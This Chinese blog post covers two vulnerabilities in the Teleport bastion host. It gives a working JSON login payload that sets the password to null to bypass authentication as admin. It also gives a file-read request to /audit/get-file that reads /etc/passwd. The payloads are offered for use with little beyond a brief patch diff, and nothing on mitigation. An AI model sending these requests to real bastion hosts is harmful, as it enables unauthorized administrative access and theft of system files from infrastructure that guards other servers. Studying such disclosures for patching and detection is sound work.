teleport 堡垒机任意用户登录漏洞

作者: print("") 分类: 信息安全 发布时间: 2022-09-06 14:24

一、任意用户登录

拿到更新包进行对比首先更新包更新了两个文件

对比auth.py

两个地方。一个是elif 改成了if 然后是检测了密码是否存在。那么跟进去代码看看login 的逻辑

只要password 为None 那么就可以跳过密码验证。

那么怎么让password 为None 那么就直接用 json.dumps

那么pyaload 如下: 

{
    "type":2,
    "username":"admin",
    "password":null,
    "captcha":"rhcl",
    "oath":"",
    "remember":false
}

二、任意文件读取 

/audit/get-file?f=/etc/passwd&rid=1&type=rdp&act=read&offset=0

还有一些其他的漏洞,在代码中emmm

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论

您的电子邮箱地址不会被公开。

更多阅读
标签云
Apache2.4.50 Apache ShenYu APISIX APISIX Dashboard cc5 CNVD-2021-49104 CNVD-2022-60632 CommonsCollections5 Confluence Confluence CVE-2021-26084 Confluence RCE CVE-2017-18349 CVE-2021-4034 CVE-2021-26084 CVE-2021-26084 复现 CVE-2021-37580 CVE-2021-41277 CVE-2021-41773 cve-2021-42013 CVE-2021-43798 CVE-2021-44228 CVE-2021-45232 CVE-2021-45232 RCE CVE-2022-22954 CVE-2022-22965 Django E-Office grafana keytool store log4j2 MetaBase ONE Access python python爬虫 socks5 socks5搜索 store 证书转换成nginx VMware Workspace ONE Access ysoserial 代理池工具 宝塔面板 泛微 畅捷通 畅捷通漏洞 通达OA